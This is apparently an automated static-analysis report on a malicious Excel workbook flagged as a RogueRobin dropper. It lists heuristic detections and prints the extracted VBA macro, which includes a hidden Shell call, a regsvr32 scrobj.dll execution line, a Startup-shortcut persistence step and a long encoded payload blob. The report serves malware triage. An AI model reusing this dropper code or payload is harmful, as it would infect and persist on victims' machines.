MALICIOUS
508
Risk Score
Heuristics 10
-
ClamAV: Doc.Dropper.RogueRobin-6826034-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.RogueRobin-6826034-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Call Shell(final_command, vbHide) -
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
str = str + "tup\OneDrive.lnk"";$wshshell = New-Object -ComObject WScript.Shell;$link = $wshshell.CreateShortcut($p" -
PowerShell reference in VBA critical OLE_VBA_PSPowerShell reference in VBAMatched line in script
Dim powershell_command As String -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
final_command = "regsvr32.exe /s /n /u /i:" + sct_file_path + " scrobj.dll" -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Oshell = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 24345 bytes |
SHA-256: 84f295b51e92f1ff5a3a91bc4628bc14e9ca7ae41072beecd0db964e134c1d48 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
449 of 664 identifiers look randomly generated (e.g. 'aImhURPhJLSdZpjqcFC2phyX4zE1uY9iMAGes1ye'); 8 string-concatenation chain(s) — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Jobs()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub New_Macro()
Dim str As String
str = str + "$content = ""H4sIAAAAAAAEAO19CXgcx3Fuz+zu7L3AYIkFQALEEiSoFYAFcZEEKFIULlKweIkAL4kSvFgsgRUXO+DsgiR0QJDkW"
str = str + "E/WYcl+dmLasiX5VC5L8RHHx/Od92zLseU4juOY9PliK7FiO4mdyIeYv6pnd2dBgJad5Ht+73uApqe6urq6urq6urqnQe294WHhEE"
str = str + "I48Vy8KMQHhPy5Rvzqn0U8ocYPhsR7vZ9f9wFlz+fXjU2nc9FZ05gyEzPRZCKbNfLRiVTUnMtG09no0P7R6IwxmWoPBn0bLB4HhoX"
str = str + "YozjEjF8/XuD7TdEk/EqHELPIeCTu2w8hieJ5zJKOYFXKLUTpjcqMF/y65neEqOT/Su/ii38eBt/9QvL9sGuZTn5MiABeRx8Uov4l"
str = str + "6KT4Ey2Kzj8e5K+15dvzqbN5vL+ftfo1W5LbxuLl7WbOTApLNsgoNDxmOd01+K/dTGWMpJSVZGZeZy+hG1gq5qceku9ruYpLfOAwm"
str = str + "tkihCL40V5KV+0/316oxWC0uWJQlrbgk3AD4JoHMeRKc8QE19knTC/SxrOxKpTEIKrWgrprOlzisMbt6rk4kL7cKiF8fjMI4kAk7G"
str = str + "5d53E3JhpvNaqBfjbsqfLEIoBiNUgCurvmaNitu1d3fm0BWGfMRxJAGl9wYR3yff8EvkSvLTQhyyWxOiRt/QvtRK+jyKxAUwtkV7H"
str = str + "VKOICMwwct0GJtsi1KYmtoewGyq4v57iWK8raDeW11xdqm60oMMDCF9e5fgnRdoPkDxG0jVxmgdTCYlF6yasZSc3RRXrZ+k3ZRl9n"
str = str + "IMIFkUXSwPl3vnjxYknysJe5hH26d4E6IZueXMDL6Y7w66E0q/rcxnpr9BYaqbVzTzTXLHgKOnuiuXZhLTJPNNd5nmhezSp8onkNa"
str = str + "/EJsgOf7EIttek731QUAqrSgrqXNei1qSOk+2y66Ph1evjpX168KBEXujee/1PkLIlL4rKsHrJJ30Il1VzQqchFwkSaw66wk+3N3E"
str = str + "rjtpYUpDGdAUY+s78o5R027HARO2XD7i9ir/eah8iwotQS28IljE8WiPv+AlPBa+YK9OY9JMjqUqXePwLBco239XrN+4gYfdUiBir"
str = str + "7jHXUzVWF0Y3PmW8AQdjv1f0Wt5qwq3V82Q5GlutKW7fX/CG10US1A3rAwNj6arvq9ECNsYFabCb6ZqWovJqwU2ON3tEJdrpmbKRO"
str = str + "1v/i4sVcK1lEUA9qd3RQkavtqB68jUDzJtQH6RUgrTFiBbasOjOnXNpFyVtWvo1g807Fknjb0z+/eFF39sGBi0tZ1jzYzIbd2P6oc"
str = str + "SXyzZFzVaEYvJFvY825qgoJWYz1kF5xNFxZVRlrXdKkveUYtKatVGi0FWq2vlx3xY/rznihz5fK9h9sQQ9ego9VUM1NssomNq6iml"
str = str + "71M6gpaOEll00FLpuKrZajQgXUhVVGvDAWMbg93/mrmB2Tleyvrd58BA3WlPUGHl/rDYBc6MEXNTSs5VDLl+sg89HxY+8FEp+uG11"
str = str + "k1nUki2500xCd/9wLFy+WZLi0hfO//wLFN/175Dp1BM8PsCAMqnKRq5RLnrgPfgADIJ7GG2KLGgv/E5eMiTaDeJ2Fp/XqES8vtbpq"
str = str + "vqdg8tLA/5AW1NWFRe+jCvnEGvPT/K41P8PvOvPz9I4YPSTyOdkjYzOtea3Xug0sw748HJ4S8BjwRj5N6rDdY/QWuu8x+mhKPEtKd"
str = str + "XA/zYsl+PxPMU3cxjaazU9d0N1zqKIEvW2a17gKuK/baVWzVS3rwD3UgbrLdqAgeNipO2Pbaeh3kDTXgREvLcbVSCKSP4sb20lYEv"
str = str + "lCk22wlqcQ57dCfNXcXyZXm6nW1MS8RF8yq6hpqMWeLOFz/sdu4vI/QWB+DgkLVSkW/KBSpfGYz65c+z1c+/ly3TxOuuE5UvmrdFT"
str = str + "DOgq7dFfNOROB7qyMEGrkgmV6HaXRuhZNEdniRvaGtecWr2Cg7txijIHV5xavZGDNucUWBurPLbbS+iaZNYDZIjnt87/USOpmR5nm"
str = str + "WrjPxjW8aDhW7PHHue7+srp9T/8a1qA52M9QMFbyL22rlrZzTCspUXfHqqmKR9d0T6yfF8QVJXxJtvNzF/XijnIN7FTNR4Dh5ciyA"
str = str + "7W4AmyTK4DDCkuXivv7zPCt5WppgHNo1B+slGphw1eoGuJsHynoQw5W0J1OQrYyss5Crl4AQ+cDGEcF0ZKFrF+AZTvjbl6+Wl3mR4"
str = str + "Hlfj7R3GCRrOWoelmSRq9F0+i7M1BqsdFfQAfuDNrQwQI6JCWvoDKI32qJ31hRIKjkGGm5NmNDKw7C+bNO0tgnyzW23fFr+0X7IN0"
str = str + "uBynszQ3TyxcJ+3vvJwfsH4bmBO2SEGmJ1+P5azw0PjfjeYsi3X0bSHsPET0ioHNsfMYuamTnNWXIYnttsr1FGlWEpd9w2EdYeo9e"
str = str + "13L8fqTYkdIAZDDhK1mDxeBTyjIM3l3OwGVn4FrC4J7lGGQLSB4u6XY8NYtkYK1ahN+6T9aSXHYsxyVWLkbALkZgiRi/EMsw+F4ZU"
str = str + "hqgxWAhWJgBFoMPLcfgHeKyI1NhG5mK8pFpzS5l1nV8GY3olkb0pRppbb+kfn0Jw55Wl5sISa/7sQX1637dS3va1p1T2H/wFNJ9xr"
str = str + "W0PI6s7LFeik+7QqEJ9Z1ynzZ5iQeDC0ZgXsTGJTZy7k6tpPtLimvO3ekuFpvP25Yldv3mP5e3qkViLyMvTRNWLivFDqocpm9UayK"
str = str + "8TJsXyePShGaPawadZdm6suxvrpwlCDpP6L9dHoMcwDOG521kSLazCoSDAuMmuqDWJlusF4SLSuCddZTj45h21cANeMrx9DPulU8B"
str = str + "H+5QBZY9OlvTVUcMr1afVnPUp6lsGl1qxKdq51r4zGNUnmMhhiQ9lC1O5jpnOSbi45x/ISQ3xfRimOdSZ+UCz0naIEe4TJjN4BCRQ"
str = str + "7GRXZc83nDSYQRBrrYIzxu2Y4mu5Anh4DejEYAu2QaGaharKOSg7WKAJg/nrkNbq63V0AO/rtLZAJ8DNNctOOgdQ/ztCy4QddsW83"
str = str + "7Qr7Ho7wyXlqYaVK5VqZKsvNpeObaXBBgy/wGVuQeXZ2P+0slrynKsvJaN+s1GF8ybNi7mdYC8cpPO+VLJjYAq1Ng+KtpPiDQQbkl"
str = str + "6gEzT5zZvc5VNE8Q1mFVa3MuBUNh14aTbfEKzSNzmPxbAsFPSwyz0Aljju6BvjPicbV6OdFG5/QK05tXiMvRtWdAKYy1Vgspa33fg"
str = str + "c9w8Wi26q0X0W4eWtCj+D4x+WJVzoNLav+x08KKpt/psRys1NDpuPjVr+z6/4lrNImHtG+s2f4Rx519UKZBj/7jJbR50i9lK4Wjzq"
str = str + "DGYpEYmG/FHAnyUZ53E/QgCRMJOWWcjnzR5yw+cwq7SgU1Yc8au58W+ymfeDO6xg6RxLnJXCR5rmfNUKbacV+X3xkaf/fCqjg+v5H"
str = str + "lVra7BMHQ3rEKHqazRvYjAdBdiLdjeWusgq9FrP8nigys6ybKdUDXqmIlhZ2k4dGej7+q1F+koik+lzkPx3gVa9Tnm4y6G/TV+jbN"
str = str + "HLd0d66qK+CVMi4h2DCQBVdP9xiihAoCO+pZVVnDtij20H9PVrahHKMCuSKjCrklSShBK0QMyy5oIhyLhCvZF4Uo9tPQkDbhKW+xf"
str = str + "sJQvkweuNE+4yybJmmWPn1w14YrW2V/jZKoWnN9Uzpl5tC17VhYB9YfLqR2gljPJgb7pFX0bMISevoEXL168UCN7sOSU44KQ6NI8o"
str = str + "7ODF2Av6xy8DljnBE7RKA/TdfPv0SbHBDKMLIbb5j+6rWM+X+GwlWlpLBvkWDIJebJ66cnMf+L8GmtE/GatB86YT/iCK/K43VPO42"
str = str + "6PnUfYaT4GhMZOLewy/xiZsKa6S1qKj6geW+4q1WvLxVXdacuuVXWXLVuh6lr54Lgv+CNItI2UYhPYIhT+OPM+kYgoWuGM5ZtQnPs"
str = str + "l6o63Bf7l7KPvOtDzwtPXD8hhft9TKOlE/jdUegDaaOKlhA9Ca3Y+C/HltJCuMix3S3QO6mm9Qnd6dY88J6XDvtolZ5thp+6BK/Ho"
str = str + "Hsmu6wuoELkcvb3UdnRI5w20lrfWHMM23KW7jTHCequ8/MUkrDHuEFOiXIavbl0rAFZA6w77zicxn+XGr4Tb71r+BLqvUS3TbLzSw"
str = str + "ce1svCtUDPbaNivFs6f6QSZjWPV0jawvGORCErthUC20smtFfVKpVeEKyNhvZc3HZW6fi5cpVdZ+4jPE64qUq4JvaqmHCH1Gtarap"
str = str + "cS1i1HuEoPM/varpAeNn9a6HhbQA5+qCYcbJ3WK/RwY2XssKCvVuX1K/QgBjyor5JcNnmteq3dqLTqV1TSkdIBaeVD6Z0h+CqbshF"
str = str + "56BUlZb4Z7shdFbRt1tx6qADY6E47aPzuK3rJg/J7QbWqV/N4NcvBCrjl4RvXk7N5lR1FrFqpyYXqMlyNo8xuih5929sUq6A0X7c9"
str = str + "vGSW+i43S3+FW4uoekQaXI1es4LB3aoWZu5q0CydULV6rTxDLAbjhCrMsTV6rb5myRyrY9whSVmzdP6ikVo+UkdhnQTq9NUSWO3Wa"
str = str + "wuDU1cAVpck/SJrpjSx7qKJZfPb9apeLz/QNOgN1meZ5fv8StR0F2mWfm4hYUq0N1ArvCDAr6+V/Bv1RvkBaOcPaHY1Ls/IfoBjfW"
str = str + "cJR+1D+xpymjzR10XCTXIQ1kfCG1qv1aP6hnPmL4rzypof6zA/qKSq2drPrtebl86S9XoT5keTvgHpBn1DXed79Ka4JpHuqqayubC"
str = str + "uAKwv9vfCjH06rXPr0ci5UuGBJZq8sHMpon0jr0XNNnQ5fE8RBrXQfS2FGILuRtyPNe/deNqLsbpD/FzwnQKd9eO79Eh7uc243y23"
str = str + "4/7cEaTYxx2lief0otIxQDJfY9xgg28swhHjuA1/UxE2m7y08bmZFDjO2JdTNzxGgjATSHyatR9Y56FbCWXINS+qzvE2D7uL4IVWJ"
str = str + "8BqBqMX6sNOZ7FE123hFjSktXgL8cFm8Y6/FfVyn+0QM/TBlPbPC3SCcUPj5I0nrZsDWma9VOmxa25IB9wRDwfMgSqVB7/KEZskub"
str = str + "0w5f81cGPQ3bjKSJEx3xR3e9WTR32tPryOxU6w7CC6degGn5aOTQl5vhBGXIcOCYT8emyaiMwFKMZvvsJb3HKbHyvBAc1Iky15zH8"
str = str + "hstYKj4XQzJ8RAuEP87wFE81fHOfYLTSWJ0kRGTJrVySstfZh/dbO0Qm7MUNIT5XnxUg9HaSRskyIZB1v+UDB+msN6RosX9Ox9D+U"
str = str + "7vqoudpXFIyPs/zchQA3F4z5yQ85G1dZ/lazHWZ7bWfYbtvRtcd2Rq07y06jVz7Vtp1NX+Zcu3RSveJBtP20Wh50WafcegFdJQ+4L"
str = str + "HTYnIAC5PLQslaNhekSCt6r5GUUijsPOfg+jU4bWHkHpcYKR5xyH9tNq1Zpn+qS9yk0dcXtqnYhKC9xhP3n/w3LTdnu1d1g38XV0i"
str = str + "6O9qK2Taq1qVtj7UzrbRvT0sUW3p1utF3z8Cy9rMICeEvbVTut7indBYl/XZQuaoS9upc1zcYiP++xZ1QvvE/3si/nj/K1pY/yVAU"
str = str + "drYCUG+X5h/+8isyaS/pZdplkRfVBDeW7VEshcme+dAeKyNK2A3XX+HvP0lF2oCQqXT2QdwikX85S1DFARJeg227Sg7Jn5i2+Am5k"
str = str + "2c1p97I3QBqWvS3ijgR7vy3IDgpNxgzivGlZznXLhtyPiOVjqrJdcmnfW19oiYeocNdB00Nwd7XlZYXbDxU+T6H3cusr71sFa2xD7"
str = str + "dTldoe9TlzXbedEfQFsoN1xhzeu8YC0eFp0P/lPhde7DtGwVwTl9/efi2sHFYbp/JQ+JwRL650/Euj9BlBuDwdaQW/j9LFhHx0l0R"
str = str + "mukNfd6Bs9PJigy4SvtNbSfdaHod5XC/LIps+6kOXrfYARLDcjWhc083SxuHVWkx8KZG5CM28tlY1p5kIpt0sz7y7lejXzlaVci8a"
str = str + "33axcvWa+qlQW0rAIFUMWHzZ/AY+bV8md1QjotRbSg6L8Cj10/EZ6eGipHl7js+vh9WV6OOez6+HNZXp4okwP7yjTw++X6eGPfXY9"
str = str + "/MlL1wMbmbwj6BQj8CEh6MMZjcKCOq1PERxt+dTIOb5hKC3v7YoV0vv5iDuA6dYGlMd7zrrlZZ0zys1Xd2z5y2J8sqA7ayLSsbhae"
str = str + "2KzZPin2Ntznci5Kq3kmZatpbtsFxaqNfP96L3ulEGU/NoU1sxPLEXaa8WNkrA1myZ0p/wC5fTrrmUvRS0SNVcpTcaNF1o2cs+5cO"
str = str + "VLmedpB+2tORr0erC5/Bzd2Sspqr1JLhzLVHfW3sD1W9wsXCxAZHIW8e0UWou1Sz6GtagYmtYbaFwopLF9bxvgZnW3pcZlVOheToV"
str = str + "2ZKEXXY+t1Dr5Io4rvUr7VqWlEG/Tt6EKiu1M0KpGTlgXXOi7zHXqki81vgteqViOVC1+QsRiwls4a79RxvL6MrWlXm98cCdIEW20"
str = str + "1mpu1V17Qy0f/TZWxvJ4vcldc9Tv1tCRb7NEmjFHfpjaJbcauCA8pXYPHCi1u1d+9/pPaFcLXHBtXCVbEsW2du0SrkrrnDOq0Gom9"
str = str + "NxpQacFZ2gUzhZB8y8wOOZ3aQWdLyER7M4u0MUWO3IVIVuWIKnmQms5sjFgdoDWuJV8wG3kA7QlzWhLWtCWMNeW8F2g2zZm3k+2cr"
str = str + "ugyPgOpG5Wt4n9lXVmvGSTy1a75IiAv0qXsosgcV5wbLwgins9+qlX5OOwfZehqCBc0CNHWz6WQpqh39LHOyCM+QnqDHFm32ks2DX"
str = str + "zJdLMnWS4VNn8F2QdZihgnZYyr0DzAl0z8hiLNFmajbtY+yAx7mZlurkgyAy8UgcbA7+5DsLOC76N/PEEEHx4S8mO/uqvyCZl/7/3"
str = str + "X9L/bdQt2WnzQIB08d6CLsxjQTHrMe75P6SEgg6+9jXwsnQAF0Z3EFeaSyt1foGuj6lmKlgY5VcUtSddhp9cBjXuvyDcNv2PjsLjW"
str = str + "23Tnrq6vO2COm+9vAjzl2q7INJtBZHMPwrS5GJl1/jhUyKWKEVZTpwo+ZSnZWwjZUEfiorQLpFLu7xclhwfKsjhx8CSdgIssEcObD"
str = str + "j0mw9ssKDa4AXhLfVHF697R8EfO8RHFP4upEfFHV/7Q1+N3zonuipUOhv6ig3OVZTgUGUJfp8N3qMXYL4+ihhlne6SF0hpiS7s83l"
str = str + "N7dRqOGACAd8M/cqFat3FV0PpdKCNvgLI26F/q5eOMSqqlr3+0QB0wGO+rWollVEcEtCyHt7T3VJo2vx6VZF10GsOhC9XPej2xn4H"
str = str + "72Llg+Fi5bDTUt4D4ZIyHgsvVcYGuzIQYiCgsHemXB9/uYI+5KdBi7iwf1ERYbe/iqYKwWml85zCMI3zo9bZUOPq2CtJ7g+GC/Fu7"
str = str + "F5q/L+RBcbuo6KvhOlAjUxSi70KaYOs8bVCjYD5U4C5+2luPUDJg9QbuprqIR1pc3SXslkjpWnNzJKUqBktNHbXrEK4t5qWHr10oC"
str = str + "YRwj7n7r9f6DT/16qxh6iLdBZ1RpV3WIof0c0bVskre7evklf23rRKXtn7BL9Xmz/i9xqzsprPKMwefjeYY/xea5rV8qu6+XsE8MU"
str = str + "6/pwXOScvc3BwSnc0Gtcu0ifzxugifSWvWaTzisiiu0jj4byXUzo6YktY9DMt3YJpnFwMciHdgyneOPxwtRS/QR5mmZ+oluL/OUtD"
str = str + "u4TSNVp5NUzebVmzSBdLzC+CbJGCUPO7BFUzVYSpajitLUpSV5SUVF049DB/agnws2opwIuWAGpE6k+j9yJ93zd9ABfpi4YZIYi+d"
str = str + "Zgxgtbae9QvJMO2iGQYi0iGHcyIdicv4cPpYlQU/ohm2b8yYmgD0zQX8xuL0BVFKFaErixCLUWotQiRY2aHvhgnkYobKp91xLNIfz"
str = str + "zVcrPKf0Gg2i7zOzhiHxh92YBiXb+iv3k73dPe0d7d0d3ZJ3iXm0H6GArWY0UMYBBegWf9aN5MZ6dyRPEwOt2DcVt/aFR8qkP+TeD"
str = str + "63YdGhvD+MvLPwObWD2To3FrIuS2UIzufULy00f6Z0k0LErU+LPjsWUA0gY4IdIvjOPqzOvq7glbB3675LoBilblsMN1Pk3+7mHbJ"
str = str + "3mjiYecpryZCLkpf59jpreC/MtDERxxb3ZoYclLazOlPOP04p1/j9MtM86TjIOrey6mH8T90fMClCc3/jKaJf/V3+Xxiu7/Wr4mva"
str = str + "s9oPtGhhYG5yR32aeIG5c2gfMRNlP/m6QLmmEo0f+Dbic6/x1fr94mvBD4C+hH3WUUTGQfJedZJbR3nFhPcYoWDODzF+J+4CL7oJj"
str = str + "5PBqitZgelX3ZTOsPtTgmiOaVSeo+fZBj2EZxRf4C+v8nzjBYS+9TnwXm3iKPd67kvzwQo3e/ZiVa+oRH8aj+34ibMlR6qu4XTFHP"
str = str + "ewv3VuBeHg6SBd7tOBDQx4CL8HW7C13hq/Z8T/bSbFj9gnh9TKI16n+G/h/wwj5O0vkrxJ1rQ38+5x2FEj2rPweo2iSjn5oU994qy"
str = str + "XHVA5po492arXqtwwB0T5/5irpNznbAvXXzRv9uhC497D+CnPJSedV0HzL2cftZN6ZMeSr8hqPRKdR/gr7kpfZf3eqTv9VPppzh9g"
str = str + "Cmf8hLPiEr0v1SI8tOC0qYAlX7JRfgLnN6mEeaoh0pznP6tn3i2+6n0i27m4yW4itPXaJR+iPm/O0DwKpbnHQrBb+H0n7ndf2BJ7m"
str = str + "WaRzi94KP0/Uyzn7n9iDHf5XSX/xDo/wClmvgCp4fEMYcmvo5eH4jS+Dwivqfd5FDEA1bupCfpUMX2K2Ru3FON3NFOmatwTzmcYtH"
str = str + "K/SKQBadfdMvcFdpph09MbpW5uOMOR1A81muVKXc7QuJdO2Xundp9jkrxsWtk7uPuXUpYbO+XuTXuteoq8bCV+yDntEGZ61EfdqwS"
str = str + "ISu3BrlqUWvl6pWHHRHxe7tkzuN52FEjHtstc3+Nslrx1LUy96j/dY46UXudzH048LCjXkxbuV+4HnY0iG9aud2uH4u1Ys8emfu5L"
str = str + "+loFP99r8zdH9glkNsnc3cjt0783n6ZS6G99WLVAZlzeu5wbBCPWbnnfA87msXs9TIXcycdG8XRUcq9Xvxvzq2iK7jilbUtmJcbRT"
str = str + "3nHqnt8FKZYG+o1b5WUBnnKv/cpQUedRRzwT9RB/h2laR8CpRXFssOagO2XEKr5LhGUs6AsrVYpgYHbLmaYCV7bEnZDMp4sfWbXJS"
str = str + "zSx0XbzlMuXvgzS8tI4/wMy+lX6Br2rBE9hEBjgv9BP+C4VV0xUL8IcUpwkPLiggplZWqeLWorHRYtbY4JJ7oDzBsBohmXiWae7nW"
str = str + "Z92U3hGg1Md/NS3rbmUZZnyUftJLtb7OnBu1UumfB0rpKT+18pxagn9XIXhJyrNIiSriPk3CJcxVWgluCzqxHrvgF93Yu3pFi1fBb"
str = str + "CUN1SH1YZRavOTRKO3jtJ/TEU6v5/QYpwmk1SLN8ClO5zn9MXN7gVNFIf5ehfB1SFeLNzD+DSIR2C6uVJ5zDYh1yr/4YMXKbcE9SI"
str = str + "3gfsYcQnrRe5zhBKdTolPp0AzAf+oZEPeJD2qnxV2COHQqj3lvE0+Kef/dSD+ovVL0KaPA9yuv8z0gHhdHfQ+LEeWD2utRd73/UXG"
str = str + "9stvxNqSy9b+Ebf6ZGID1HlNcjj8QCcj5FPa0Ld73I32TWon0PqxD96HkI8zhbwA7vd8RHxc3+b+P0tei7tPid5lmwvUDwgceEJ8R"
str = str + "O+GlTimf8f5YzKOtf0Xdv1N+Ccr9ikO5T7zgptKveD0KeLorlLuUzwYiCvU0hlLS0jplVrtb3KXc4W8H5rOBbUy5U3lEudK/S3mD8"
str = str + "nrXfmAu+nYqjytpJak8yT2iXkwpx5TD6MvTSkrcrVBP7wVltfYA0qTvL5FOuL6qPK28RZxXnuW2nhVvdD+v/JnydvT3z5RnPdVIBw"
str = str + "KUtrkofT1gauufQfNFXyXo7/M/gHRT4AXlM8qnlQHAH/W8oDwL3bpVGt+Q+jfKVd6w+rT4FDztI8pH1bXqOsXnOy6+pTwD+FvKRLB"
str = str + "LfU75nr9P/RvxpcBO9S5x0XtUvV6h9FnxuO8U0muVu8WPlW+LW9UfK9/1LqpPK9e4HgT8T67Xqo+w5I+IOd+71OdYn89hjP5YVdSE"
str = str + "8l5gZOnz3g+D/p3g8Jz4pEaln9Tei7oO5YtI7+K6H9TuVQjzVWB+KqiVtwiH4xFlSPM46tSfahVIv4pRfkTpD65VTynfDVQ71qlk1"
str = str + "bryObHGcaX6j8oGx13cogpf04NVpxNeQkX82YN0RPQBkxZXOTxiRlztuFLcLx50tgu/eIejXYTFu5GuEX+BdL34a6St4ntIuzm9it"
str = str + "NBxl8nnkc6ypgbOU0KF/icFJuQ5sR25wg4v96ZFLeJp5EmxfuR3gM4DfxbnPcw/h7gv4mU8G9lzFuB8bneyphPMuaT4rWix/VJ4Ae"
str = str + "QEv47jP8OU35HvFFkkBLeoRB+PadR5/3iFc5rnNS7RSdJ8hin33RS68JF6TVI3+XcKwYd+8Ww43o8o3gO4TmC5xiedeIT4jpY8Izy"
str = str + "GuVR5TvKRaVWbVKH1JvUSfW0+kr1Derj6qfVb6nfU59Xf6pqHI29X30CfjilUdoRfAI6b4IXV8UG+DpFNCNVxRXweQrWKLdwLtr+N"
str = str + "IR/gn5R+jdK8NPqCDNBOU7Gl+W4OtomCA/4e/HcKzYor8bzu/z+gmxk+9XJ8fGhdG42k5gfzCRyuZ6t4x1i+3QiO5lJmVdPjCM3fj"
str = str + "g/kdmdmO0e71yWvlOMDGfnZlJmYiKTenmnGBzdsP3q3vHxjJFMZHKdYswYyea7u4p8usa7xMiR3PTodCqTsYHdYmJLT5Gqc7xH1uz"
str = str + "cIqZS+fFDY7t6bYV9YvteY3Iuk7pazOVS/YNidyo/Nj+b2mUaM4N7RrEbu8WYQEpV+0cHR0bE6Hwun5ppH9kvhowz2YyRmBxK5BPi"
str = str + "0GwRnKRkJpc0zEx6gmrmsed7GTZyM4mpdLLAYNDIZFLJfNrI5tp3p7IpE0XUysgkvwbnTDOVzY9Nm6nEpOifBHZSlozk+vP5RHI6N"
str = str + "bkcq9HZVDKdyKRvRfGJdCY1np4Uc7MQKTV+guBZ00imcjkCk5k0WiBo9xySg2hozBjOosCYmcHICYzGRMoczxvjZwyTCDBcyZQYhE"
str = str + "j51Eg2l09kkZ1OT5jpSWgxJZIY8KnUOP0TO+KsfJmpGeN0anfCnEhMgTaRK4DpbC5l5gs56theyEVwyQrECNmIkWN4FFrEaxc6JQb"
str = str + "RVQPv9MysYeapJQyhyKdyRZgY7kvMpETODlBlzlDxrrlMppg5BGk4AwO41sjlS1QmtDSZmWcEazRLEJpJn0gnE6T18XwamCNmOp/a"
str = str + "k86mBBmQyFNSHCATMidm83N4p3PjpzFAk+NmCn2DFoTsJOqZ8wcSJgBoNm8x5MKRSQy5mZ6Yy1PXZ2Yhhck2AzJbEQ1jKTeUmpibm"
str = str + "iLVlVU+nM6ly3D9uVxqZiIzP5bOL4s2E5OpmYR5slQ0ljChmV0m9ADDOHlpHVLz4ZSZg24uLcTYnUhPzZmsukuLh1K5pJmeLS8cSp"
str = str + "1IzGXye1NkkDZBoOORSRgxhsKOlzriBg6mMomzDOXs5ex0Lm38gAnrSeaXE3p23kxPTS9bNDObyM6XCg7OZckgGJ9PT6Qz6bytNCe"
str = str + "NjV3V8NlUkvthDMzjNZ06S5NtgmAyvcOJzBxsKHEaPHkaiaF9oxDxFkz29tRZGGE6O35qLmXOj+cw4eFfztqzI9nJ1Nn9JwpGKF0J"
str = str + "JhEmWNJgwCqxBG63hoxKTsDlpuRplcibcwVwzLAAzBILsoTOlXIWODo3YUFnEmlygQLuXgJ7E/nkNKXTwpjLjx8gABx3GZnJlMk56"
str = str + "r40M87myrNUuieVnQJIvHcZ5iF44uRJQaWYgifZhbEDypQWBjFrnEmZEjwg/4kw6VChA26BAakTzMX0jDgIL2jMiAEDviaRhcDprO"
str = str + "ifnR0yZgiyuWkLMylfpjGXxfQ2JgCnc/2TGCbxMgNJDvwGjLPDpxOk56L6Uycs9y3IyfCol1y6VJYtvxvsZ235I6mJazGwKdOGGz6"
str = str + "bTPEUYiFH8wkzP5I9YVC3yfuXEDPz/ELvRzOp1KzIyRQPN0MOm4kB5qy3JTXUfEoMQi+mGJxGMjVpClomyBjkwiGuzednD6Zgkbm8"
str = str + "lFDAZlKJmYMyM5Y6m7dAa9WSBmB5LgA0pnjlE7mT18pQQlghBatyglSZJlWOJ41s3jSowJQNAgOrRn4gnYfHOY21Bplb0nl6wdefJ"
str = str + "gGMPWQRBR1lJxPm5LBpGiZbw8HUZNqEPstL5LI2nuJMIWDJA4b92nJZIz8OLVq5fozKaYbakzLlF6aH6J/IFTQ6lE5MZbH0pJO5pT"
str = str + "NzhLpizI5C7jQGcGlxYU0olksNYqrRspyTJoS3XBtzgp0EOc9cUV15ztFw9Gcy5I1ycv0p5tA/CchIh600JzAnc2L41BzchRjK5mh"
str = str + "hzmMKFCWkMYaBT81lEubw2VkseTRcuWUiFyH9ySj5iP2zEkUDw3YoQbKznBWVSIw0KwkftJZTO250Lkn2TsJbM9WaAWLkAGIqEqcg"
str = str + "yr5Uvn2U7C2f4+HvN6cwmlnkpiaNrrxIJMfzAGdg4AIxEfUUq7+YwgP/M4PX/glyzDYfbWMtuF+Yl0isiQR5saTR9B3kQEycSU2My"
str = str + "5gMHvp02jSy1L7dzYhk4Q01F8vI0IX07jxXhWXvsC0ER7bBHsNAU/hBcZKc6QdSpjVBefGwjMHyY3vSAPPMN8cwB8FSa5zvN83EPE"
str = str + "MZSmRcODqNRrGqWX7XykghYKvw92Xzbf9cfhao5SacVbQXC98++rcKbSYlZIzAIP87hlOT43NI5hhgaI55Spn2GUfS8ORnYN9TqbN"
str = str + "W99Bbysg1irwW1i64BO6Uvau7EjPpzLygCID7ZE26PQh7E+a87BnTH0EsBFZD3AkDyNxySFrwLkHal5IicuQABaLDcGzzhahUZozZ"
str = str + "cZ5yiCvE8MwsUvpx94s9+BWOLtr6YecsvO0iL87iEcG4OCQKOcU/LA7idz8e4d2HElkvgVxCyF/hSmAfLKqPY88dE8fFGeyNu8Ud4"
str = str + "kr6exC3xbWiySprlXhXO/3rAxXTqH9apMTLhCEmhDjULybxawKDmSW2CeLZipox7PATIi5OiH6ku0QH0j5xE1rqEG2iB61tA9wJuI"
str = str + "tblnAvw8rm5bkeB64Vsiz/FluXr9WDFtvBvRMttXOf7LWuhB6W1ovSgaN/CnnMKJQIRwe0nER/stBbir7+rRvk3BWgiIo5QFPIm9B"
